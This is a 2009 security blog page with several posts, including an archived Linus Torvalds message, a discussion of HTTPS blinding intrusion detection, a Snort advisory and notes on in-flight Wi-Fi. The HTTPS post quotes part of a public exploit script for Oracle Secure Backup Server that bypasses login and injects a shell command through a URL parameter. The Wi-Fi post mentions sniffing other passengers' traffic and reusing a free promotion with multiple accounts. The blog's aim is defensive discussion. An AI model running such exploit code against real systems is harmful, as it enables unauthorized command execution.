Friday, November 20, 2009

Infosec Monkeys







Ran across this old gem of a post and wanted to archive it here as it's a classic.

From: Linus Torvalds torvalds@linux-foundation.org
Subject: Re: [stable] Linux 2.6.25.10
Newsgroups: gmane.linux.kernel
Date: 2008-07-15 16:13:03 GMT (1 year, 18 weeks, 1 day, 19 hours and 16 minutes ago)

On Tue, 15 Jul 2008, Linus Torvalds wrote:
>
> So as far as I'm concerned, "disclosing" is the fixing of the bug. It's
> the "look at the source" approach.

Btw, and you may not like this, since you are so focused on security, one
reason I refuse to bother with the whole security circus is that I think
it glorifies - and thus encourages - the wrong behavior.

It makes "heroes" out of security people, as if the people who don't just
fix normal bugs aren't as important.

In fact, all the boring normal bugs are _way_ more important, just because
there's a lot more of them. I don't think some spectacular security hole
should be glorified or cared about as being any more "special" than a
random spectacular crash due to bad locking.

Security people are often the black-and-white kind of people that I can't
stand. I think the OpenBSD crowd is a bunch of masturbating monkeys, in
that they make such a big deal about concentrating on security to the
point where they pretty much admit that nothing else matters to them.

To me, security is important. But it's no less important than everything
*else* that is also important!

Linus
Posted by Greg Martin at 9:28 AM 0 comments
Labels: , , , ,

Wednesday, November 4, 2009

The HTTPS security problem

Writing IDS and IPS signatures for web application targeted exploits is usually a straight forward process. Unfortunately as products attempt to be more secure via forcing SSL for transactions makes detection much more complex.

Take this recent exploit released on Milw0rm targeting Oracle Secure Backup Server for example...

It's a simple bash script using curl to post the malicious payload:

( snip )

TARGET=$1

#Exploiting CVE-2009-1977 and getting a valid token
echo "[+] Exploiting CVE-2009-1977 against $TARGET"
postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

if [[ -z $session ]]
then
echo "[!] Fatal error. No valid token has been retrieved"
exit
fi

echo "[+] I got a valid token: $session"

#Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
echo "[+] Exploiting CVE-2009-1978 against $TARGET"
shell="1%26ver>osb103shelltmp"
curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

( /snip )

The issue is that the payload uri cannot be string matched using tradition IDS/IPS without either running Snort on the product itself or decoding SSL in realtime.

Well what if the product vendor (as most do) bundle a self signed certificate and don't give you access to the SSL keys to decrypt? What if your organization (as most do) simply ignore SSL streams with their IDS/IPS product.

This really hampers defense and raises the issues that HTTPS is going to be the primary target of attackers from now on to simply bypass prevention and detection all together.

How has your organization dealt with this issue? Have you even discussed it yet?

Snort has an SSL/TLS pre-processor but does it decode live SSL for you? It does not at all and only validates/inspects the SSL/TLS handshake and protocol and some basic attacks.

In fact from the current Snort documentation:

Encrypted traffic should be ignored by Snort for both performance reasons and to reduce false positives.

This is a problem the industry needs a real solution for.
Posted by Greg Martin at 10:18 AM 0 comments
Labels: , , ,

Thursday, October 22, 2009

Importing Known Malware IP's to Arcsight ESM



Wanted to share this proof of concept script I wrote to test out Arcsight's Common Event Format (CEF).

Essentially it grabs the latest list of known malware/bot IP's from SRI's Malware Threat Center and excellent resource for tracking malicious domains and spits them out to Arcsight via CEF Syslog.

I've also attached an Arcsight ARB with rules and filters to populate an Active List to make the data easily usable.

Downloads:

malwarefeed.py

Known_Botnet_Hosts.arb
Posted by Greg Martin at 3:14 PM 0 comments
Labels: , , , ,

Denial of Service vulnerability in Snort 2.8.1 - 2.8.5 beta

Advisory:
=========
Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify


Log:
====
30/06/2009 Bug detected.
20/07/2009 First mail with snort team.
20/07/2009 Snort team answer they will fix it in the next release (2.8.5).
16/09/2009 Snort release, bug fixed.


Affected Versions:
==================
snort-2.8.1
snort-2.8.2
snort-2.8.3
snort-2.8.4
snort-2.8.5.beta*

link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html
poc: http://milw0rm.com/sploits/2009-snort-unified1_bug.tar.gz
Posted by Greg Martin at 3:13 PM 0 comments

Monday, October 19, 2009

Securing LAMP video

Stumbled accross this screencast I made for my buddies at Firehost a couple of months back. Was my first screencast and didn't go so terrible :)

Goes over some of the basics for setting up a secure Ubuntu+Apache+PHP server...

Posted by Greg Martin at 5:28 PM 0 comments
Labels: , ,

Tuesday, October 6, 2009

American Airlines now has in flight Wifi

American now has Wifi access on select planes, including 747 and MD-80's. Fees are $9.95 US for an all day pass and are currently running a free promotion for first time users.

The free promo requires registering an account using only an email address and code which they provide, no credit card is required. This means you can probably sign up using multiple email accounts and username for as long as the promo lasts.

When you sign up it assures you that the system is very secure and tested thoroughly by the FAA, the captive portal authentication is SSL based but after authenticating you are still vulnerable to any standard wireless man in the middle attack as there is no WEP, WPA or VPN protection.

Setting my radio to monitor mode quickly showed everyone's traffic on the flight, so security is non-existent at best.

Speeds were very good, similar to DSL connection but lots of intermittent latency made video streaming from Hulu unwatchable.

Here is a screen grab of an in-flight speed test.

Posted by Greg Martin at 7:12 AM 0 comments
Labels: , , , ,

Wednesday, September 30, 2009

9 Percent Of Enterprise Machines Infected With Malware

New study released from 3 months of botnet research found that up to 9% of large enterprise organizations are infected and active bot nodes.

This is not surprising and shows the importance of having both internal IDS sensors such as Snort IDS (with Emerging Threats Signature set) and a consolidated logging and event management product (SIEM tools) such as Arcsight.

A large client can leverage SIM to monitor windows event logs, host based ID(P)S and or anti-virus software. With the combined information, companies can leverage strong correlation reports matching those events with the internal IDS sensors. This seems to be a best practice approach at containing sprawling infections such as Conficker, Koobface and even the nasty Zeus (keylogging) malware.

Original article @ Dark Reading:
http://www.darkreading.com/insiderthreat/security/client/showArticle.jhtml?articleID=220200118
Posted by Greg Martin at 7:44 AM 1 comments
Labels: , , , , ,
Subscribe to: Posts (Atom)